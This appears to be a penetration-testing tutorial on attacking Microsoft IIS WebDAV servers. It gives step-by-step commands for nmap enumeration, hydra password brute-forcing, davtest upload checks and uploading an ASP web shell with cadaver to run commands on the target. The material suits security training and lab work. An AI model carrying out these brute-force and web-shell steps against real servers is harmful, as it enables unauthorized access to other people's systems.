# Exploiting Microsoft IIS WebDAV ## What is Microsoft IIS ? * IIS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family. * It can be used to host websites/web apps and provides administrators with a robust GUI for managing websites. * IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP. * Typically configured to run on ports 80/443. * Supported executable file extensions: * .asp * .aspx * .config * .php ## What is WebDAV? * WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers. * WebDAV essentially enables a web server to function as a file server for collaborative authoring. * WebDAV runs on top Microsoft IIS on ports 80/443. * In order to connect to a WebDAV server, you will need to provide legitimate credentials. This is because WebDAV implements authentication in the form of a username and password. ## WebDAV Exploitation * The first step of the exploitation process will involve identifying whether WebDAV has been configured to run on the IIS web server. * We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication. * After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target. ## **Tools for** Exploitation * [**`davtest`**](https://github.com/cldrn/davtest)- Used to scan, authenticate and exploit a WebDAV server. * [**`cadaver`**](https://github.com/notroj/cadaver) - Cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers. ## Attack Flow for the Microsoft IIS WebDAV Server #### 1. Identify the Target Using Nmap **Objective:** Determine if the target web application is running Microsoft IIS WebDAV. **Command:** ```sh nmap -sC --script=http-enum ``` **Explanation:** * `-sC`: Use default scripts. * `--script=http-enum`: Specifically use the HTTP enumeration script to gather detailed information about the web server and its directories. #### 2. Brute Force Authentication Using Hydra **Objective:** Perform a brute force attack on the `/webdav/` folder to gain authentication credentials. **Command:** ```sh hydra -l -P http-get /webdav/ ``` **Explanation:** * `-l`: Specifies the username. * `-P`: Specifies the password list. * `http-get`: Specifies the HTTP method and path to target. #### 3. Validate Upload Capabilities with Davtest **Objective:** Confirm which file extensions can be uploaded and executed on the WebDAV server. **Command:** ```sh davtest -auth : -url http:///webdav ``` **Explanation:** * `-auth`: Specifies the authentication credentials. * `-url`: Specifies the URL of the WebDAV directory. #### 4. Upload a Shell Using Cadaver **Objective:** Use Cadaver to upload a web shell to the server. **Command:** ```sh cadaver http:///webdav ``` **Procedure:** 1. Run the command to start Cadaver. 2. When prompted, enter the username and password obtained from the brute force attack. 3. At the `dav:/webdav/>` prompt, use the following command to upload the shell: ```sh put /usr/share/webshells/asp/webshell.asp ``` **Explanation:** * `cadaver`: Command-line WebDAV client. * `put`: Uploads the specified file to the WebDAV directory. #### 5. Access the Web Shell **Objective:** Gain a GUI-based shell access to the server. **Steps:** 1. Navigate to the uploaded shell in your browser: ```bash http:///webdav/webshell.asp ``` 2. Use the web shell interface to execute commands on the server. *** *** *** **`Hacker's Mantra:`**`Should we fear hackers? Intention is at the heart of this discussion. - Kevin Mitnick`